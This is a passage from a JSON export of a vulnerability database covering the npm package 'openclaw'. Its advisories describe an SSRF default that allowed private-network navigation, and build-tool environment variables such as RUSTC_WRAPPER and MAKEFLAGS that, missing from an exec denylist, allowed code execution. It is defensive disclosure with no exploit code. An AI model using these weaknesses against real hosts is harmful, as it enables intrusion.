                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35624",
                "GHSA-xhq5-45pm-2gjr"
            ],
            "risk_score": 1.9,
            "exploitability": "0.5",
            "weighted_severity": "3.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3xeb-phgc-vkcg"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89051?format=api",
            "vulnerability_id": "VCID-3xmj-n798-x3cw",
            "summary": "OpenClaw: Browser SSRF policy default allowed private-network navigation\n## Summary\n\nBrowser SSRF policy default allowed private-network navigation.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nBrowser SSRF protection could allow private-network navigation by default in paths where restrictive behavior was expected, exposing internal services or metadata endpoints through browser-driven requests.\n\n## Technical Details\n\nThe fix preserves strict SSRF configuration semantics, keeps private-network access disabled unless explicitly opted in, and updates loopback CDP readiness handling for the stricter default.\n\n## Fix\n\nThe issue was fixed in #66354 and #66386. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `024f4614a1a1831406e763adc40ef226e3d5e9ed`\n- `1dabfef28db523e7de81edeb3dd689e9171236a2`\n- `213c36cf51121ef6c05cfccd78037371f968f31a`\n- `7eecfa411df3d12e6b810e6ca5df47254fc3db3f`\n- PR: #66354, #66386\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43527",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10565",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00039",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1227",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00039",
                            "scoring_system": "epss",
                            "scoring_elements": "0.12235",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43527"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/024f4614a1a1831406e763adc40ef226e3d5e9ed",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/024f4614a1a1831406e763adc40ef226e3d5e9ed"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/1dabfef28db523e7de81edeb3dd689e9171236a2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/1dabfef28db523e7de81edeb3dd689e9171236a2"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/213c36cf51121ef6c05cfccd78037371f968f31a",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/213c36cf51121ef6c05cfccd78037371f968f31a"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7eecfa411df3d12e6b810e6ca5df47254fc3db3f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7eecfa411df3d12e6b810e6ca5df47254fc3db3f"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/66354",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/66354"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/66386",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/66386"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-53vx-pmqw-863c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-53vx-pmqw-863c"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43527",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43527"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-private-network-navigation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-06T12:39:27Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-private-network-navigation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-53vx-pmqw-863c",
                    "reference_id": "GHSA-53vx-pmqw-863c",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-53vx-pmqw-863c"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109967?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.14",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"
                }
            ],
            "aliases": [
                "CVE-2026-43527",
                "GHSA-53vx-pmqw-863c"
            ],
            "risk_score": 3.5,
            "exploitability": "0.5",
            "weighted_severity": "6.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3xmj-n798-x3cw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89496?format=api",
            "vulnerability_id": "VCID-3zwq-dz2u-pqgv",
            "summary": "OpenClaw: HGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS missing from exec env denylist — RCE via build tool env injection (GHSA-cm8v-2vh9-cxf3 class)\n## Impact\n\nHGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS were missing from the exec env denylist, allowing RCE via build tool env injection (GHSA-cm8v-2vh9-cxf3 class).\n\nMissing denylist entries allowed hostile build-tool environment variables to influence host exec commands.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.8`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\nThanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42427",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11001",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10959",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10993",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42427"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7437-7hg8-frrw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7437-7hg8-frrw"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42427",
                    "reference_id": "CVE-2026-42427",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42427"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7437-7hg8-frrw",
                    "reference_id": "GHSA-7437-7hg8-frrw",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7437-7hg8-frrw"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
